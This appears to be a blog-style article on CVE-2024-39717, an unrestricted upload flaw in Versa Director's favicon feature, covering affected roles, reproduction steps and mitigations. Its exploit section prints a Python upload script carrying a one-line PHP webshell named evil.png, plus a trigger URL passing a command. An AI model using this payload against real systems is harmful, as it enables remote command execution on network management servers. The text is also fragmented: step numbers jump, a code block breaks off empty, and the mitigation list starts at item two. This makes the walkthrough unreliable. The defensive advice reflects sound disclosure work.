A new vulnerability has been found in Versa Director, tagged as CVE-2024-39717. The flaw lies in the GUI’s “Change Favicon” feature, which is supposed to allow admins to customize how the interface looks. Instead, it can be misused to upload malicious files disguised as images. In this article, I’ll break down how the bug works, who’s affected, how to reproduce it, and how attackers could exploit it in the real world.
What is CVE-2024-39717?
The Versa Director is a centralized management tool used in Versa Networks’ SD-WAN solution. It has different user levels, and only “Provider-Data-Center-Admin” or “Provider-Data-Center-System-Admin” users have access to the “Change Favicon” function.
The issue: This feature allows uploading a .png file as a favicon, but there’s poor validation. An attacker with admin access can upload a malicious payload (e.g., webshell, JS, or reverse shell) just by naming it with a .png extension—it doesn’t have to be a real image at all!
> Note: Tenant-level users are not affected as they don't have this privilege.
Where’s the Official Info?
- NVD: CVE-2024-39717
- Versa Security Advisory (Look up advisory for June 2024)
Step 1: Admin Login
- Only a user with “Provider-Data-Center-Admin” or “Provider-Data-Center-System-Admin” rights can get to the favicon change page.
- The admin navigates to
Administration → Customization → Look and Feel → Change Favicon
- Instead of uploading a real image, the attacker selects any file (like a PHP webshell or malicious HTML/JavaScript) and names it malicious.png.
- The file is saved to the server, often at a predictable path. By navigating to
https://director.example.com/images/custom_favicon/malicious.png
The attacker can trigger the malicious code (if the server interprets the file type), or make other users download/execute it.
Upload evil.png.
5. Now, if the server permits PHP execution in this directory (sometimes the case, sometimes not), you can access:
`
https://director.example.com/images/custom_favicon/evil.png?cmd=whoami
`javascript
// evil.png
Sample Python Exploit Script
Here’s a sample Python script for uploading the malicious .png file using the API endpoint (for learning purposes only):
import requests
url = "https://director.example.com/api/customization/upload";
cookies = {'JSESSIONID': 'your_admin_session_id'}
files = {'file': ('evil.png', '<?php system($_GET["cmd"]); ?>', 'image/png')}
# Replace with proper authentication/session
response = requests.post(url, cookies=cookies, files=files)
if response.status_code == 200:
print("File uploaded, check path /images/custom_favicon/evil.png")
else:
print("Upload failed:", response.content)
Update: Versa Networks has released a patch. Update to the latest version immediately.
2. Least Privilege: Limit admin accounts. Give only necessary users Provider-Data-Center-Admin privileges.
3. Input Validation: If you are self-hosting and customizing, enforce strict content checking on your webserver. Block uploads with dangerous payloads, regardless of file extension.
4. Audit: Check your /images/custom_favicon/ folder for suspicious files.
Why Does This Matter?
- Post-Auth RCE: Requires admin login, but often admins reuse passwords or sessions can be hijacked.
- Supply-chain Impacts: SD-WAN controllers are juicy targets; attackers can use such flaws for lateral movement.
Original References
- CVE record at NVD
- Versa Advisory List
Final Thoughts
CVE-2024-39717 is a reminder that even simple features can introduce serious risks—especially when security checks are skipped based on file extensions alone. If you manage Versa Director, patch NOW and check your favicon files.
*Stay safe and keep your systems updated!*
*If you found this article helpful, share it with your team and make sure your networks are locked down!*
Timeline
Published on: 08/22/2024 19:15:09 UTC
Last modified on: 08/28/2024 19:47:25 UTC